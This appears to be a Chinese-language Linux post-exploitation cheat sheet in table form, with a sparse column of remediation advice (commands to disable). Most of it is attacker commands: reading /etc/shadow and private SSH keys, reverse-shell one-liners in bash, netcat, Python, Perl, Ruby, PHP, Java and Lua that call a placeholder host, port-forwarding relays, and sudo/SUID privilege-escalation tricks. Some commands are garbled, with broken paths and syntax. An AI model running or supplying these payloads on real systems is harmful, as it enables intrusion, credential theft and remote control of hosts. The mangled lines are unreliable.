含义 | 命令 | 修复建议 | ||
信息收集 | 操作系统 | 发行类型 | cat /etc/issue | 禁止cat,uname命令,业务不允许可限制文件/目录的访问 |
cat /etc/*-release | ||||
cat /etc/lsb-release | ||||
内核版本 | cat /proc/version | |||
uname -a | ||||
uname -mrs | ||||
环境变量 | cat /etc/profile | |||
cat /etc/bashrc | ||||
cat ~/.bash_profile | ||||
cat ~/.bashrc | ||||
cat ~/.bash_logout | ||||
应用与服务 | root正在运行哪些服务 | ps aux | grep root | 禁止cat,ls,ps命令 | |
ps -ef | grep root | ||||
cat /etc/services | ||||
安装了哪些应用程序?他们是什么版本的?他们目前在运行吗? | ls -alh /usr/bin/ | |||
ls -alh /sbin/ dpkg -l rpm -qa | ||||
ls -alh /var/cache/apt/archivesO | ||||
ls -alh /var/cache/yum/ | ||||
查看服务配置,是否有漏洞的插件 | cat /etc/syslog.conf | |||
cat /etc/chttp.conf | ||||
cat /etc/lighttpd.conf | ||||
cat /etc/cups/cupsd.conf | ||||
cat /etc/inetd.conf | ||||
cat /etc/apache2/apache2.conf | ||||
cat /etc/httpd/conf/httpd.conf | ||||
cat /etc/my.conf | ||||
cat /opt/lampp/etc/httpd.conf | ||||
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/ | ||||
是否有纯文本的密码用户名 | find . -name “*.python” -print0 | xargs -0 grep -i -n “var $password” | |||
通讯与网络 | 系统具有哪些NIC?它是否连接到另一个网络? | /sbin/ifconfig -a | 禁止cat,iptables,ifconfig命令 | |
cat /etc/network/interfaces | ||||
cat /etc/sysconfig/network | ||||
查看网络配置,DNS,网关 | cat /etc/resolv.conf | |||
cat /etc/sysconfig/network | ||||
cat /etc/networks | ||||
iptables -L hostname dnsdomainname | ||||
IP和/或MAC地址 | arp -e route /sbin/route -nee | |||
机密信息和用户 | id | 禁止cat,id,whoami,who,last,grep,awk,ls命令 | ||
who | ||||
last | ||||
List of users | cat /etc/passwd | cut -d: -f1 | |||
List of super users | grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’ | |||
List of super users | awk -F: ‘($3 == “0”) {print} | |||
cat /etc/sudoers | ||||
sudo -l | ||||
敏感主机密码文件 | cat /etc/passwd | |||
cat /etc/group | ||||
cat /etc/shadow | ||||
ls -alh /var/mail/ | ||||
脚本,数据库,配置文件还是日志文件?密码的默认路径和位置 | cat /var/apache2/config.inc | |||
cat /var/lib/mysql/mysql/user.MYD | ||||
cat /root/anaconda-ks.cfg | ||||
用户信息 | cat ~/.bashrc | |||
cat ~/.profile | ||||
cat /var/mail/root | ||||
cat /var/spool/mail/root | ||||
私钥信息 | cat ~/.ssh/authorized_keys | |||
cat ~/.ssh/identity | ||||
cat ~/.ssh/identity.pub | ||||
cat ~/.ssh/id_rsa.pub | ||||
cat ~/.ssh/id_rsa | ||||
cat ~/.ssh/id_dsa.pub | ||||
cat ~/.ssh/id_dsa | ||||
cat /etc/ssh/ssh_config | ||||
cat /etc/ssh/sshd_config | ||||
cat /etc/ssh/ssh_host_dsa_key.pub | ||||
cat /etc/ssh/ssh_host_dsa_key | ||||
cat /etc/ssh/ssh_host_rsa_key.pub | ||||
cat /etc/ssh/ssh_host_rsa_key | ||||
cat /etc/ssh/ssh_host_key.pub | ||||
cat /etc/ssh/ssh_host_key | ||||
查找漏洞利用代码 | 安装/支持的开发工具/语言 | find / -name perl* | 禁止find命令 | |
find / -name python* | ||||
find / -name gcc* | ||||
find / -name cc | ||||
上传文件的方式 | find / -name wget | |||
find / -name nc* | ||||
find / -name netcat* | ||||
find / -name tftp* | ||||
find / -name ftp | ||||
漏洞利用 | 构造更强命令的交互 | bash | python -c ‘import pty;pty.spawn(“/bin/bash”)’ | 1.禁止连接外网 2.禁止bash,sh命令 |
echo os.system(‘/bin/bash’) | ||||
/bin/sh -i | ||||
端口转发 | FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 | 业务允许条件下,禁止SSH,mknod,nc命令 | ||
ssh | ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port | |||
backpipe | mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe # Port Relay | |||
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) | ||||
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) | ||||
反弹Shell的多种方式 | Bash反弹 | bash -i >& /dev/tcp/x.x.x.x/port 0>&1 | 1.禁止连接外网 2.禁止命令python,perl,ruby,lua,php,bash,telnet,rm,mknod,nc,mkfifo命令 | |
telnet反弹 | telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555 | |||
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p | ||||
nc(netcat)反弹 | nc -e /bin/bash x.x.x.x port | |||
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f | ||||
python脚本反弹 | python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“x.x.x.x”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’ | |||
Perl脚本反弹 | perl -e ‘use Socket;$i=”x.x.x.x”;$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ | |||
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”x.x.x.x:5555″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ | ||||
Ruby脚本反弹 | ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“x.x.x.x”,”5555″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ | |||
ruby -rsocket -e’f=TCPSocket.open(“x.x.x.x”,5555).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ | ||||
php脚本反弹 | php -r ‘$sock=fsockopen(“x.x.x.x”,5555);exec(“/bin/bash -i <&3 >&3 2>&3”);’ | |||
java脚本反弹 | public class Revs { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {“/bin/bash”,”-c”,”exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done”}; Process p = r.exec(cmd); p.waitFor(); } } | |||
Lua脚本反弹 | lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘x.x.x.x’,’5555′);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);” | |||
提权 | 滥用SUDO | find | sudo find / etc / passwd -exec / bin / sh \; | 禁止find ,Vim ,Nmap ,Man ,less ,more ,awk ,nano,wget,apache命令 |
Vim | sudo vim -c’!sh’ | |||
Nmap | sudo nmap-交互式nmap>!shsh-4.1# | |||
Man | sudo man man | |||
less | sudo less / etc / hosts | |||
more | sudo more / etc / hosts | |||
awk | sudo awk’BEGIN {system(“ / bin / sh”)}’ | |||
nano | sudo nano / etc / passwd | |||
wget | sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd | |||
apache | sudo apache2 -f / etc / shadow | |||
Suid和Guid配置错误 | 查找SUID文件 | find / -perm -4000 -type f 2>/dev/null | 禁止find,cat,ls,base命令 | |
查找root拥有的SUID文件 | find / -uid 0 -perm -4000 -type f 2>/dev/null | |||
查找SGID文件(粘性位) | find / -perm -2000 -type f 2>/dev/null | |||
查找世界可写文件,不包括proc文件 | find / ! -path “/proc/“ -perm -2 -type f -print 2>/dev/null | |||
查找您可以阅读的密钥或证书 | find / -type f ‘(‘ -name .cert -or -name .crt -or -name .pem -or -name .ca -or -name .p12 -or -name .cer -name .der ‘)’ ‘(‘ ‘(‘ -user support -perm -u=r ‘)’ -or ‘(‘ -group support -perm -g=r ‘)’ -or ‘(‘ -perm -o=r ‘)’ ‘)’ 2> /dev/null-or -name .cer -name *.der ‘)’ 2> /dev/null | |||
查找rhost配置文件 | find /home –name *.rhosts -print 2>/dev/null | |||
查找hosts.equiv,列出权限并管理文件内容 | find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; | |||
显示当前用户历史记录 | cat ~/.bash_history | |||
向当前用户分发各种历史文件 | ls -la ~/.*_history | |||
检查当前用户的ssh文件 | ls -la ~/.ssh/ | |||
在/ etc中列出配置文件 | find /etc -maxdepth 1 -name ‘.conf’ -type f要么ls -la /etc/.conf | |||
NFS权限弱 | 哪些文件夹/文件系统导出到远程用户的配置和权限。 | cat / etc / exports |